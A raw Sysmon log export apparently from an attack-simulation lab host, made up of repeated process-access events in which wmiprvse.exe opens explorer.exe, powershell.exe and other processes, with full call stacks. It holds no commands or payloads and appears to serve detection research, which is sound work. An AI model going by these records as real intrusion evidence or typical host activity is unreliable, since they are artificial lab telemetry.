|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20FFD5015ACEB3669A32F5B966F2F84F,SHA256=4DB59AC5C8E60FD0FAE54BF411970EC0211FED6F2EFEC7089CE66BCFD1945A98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\S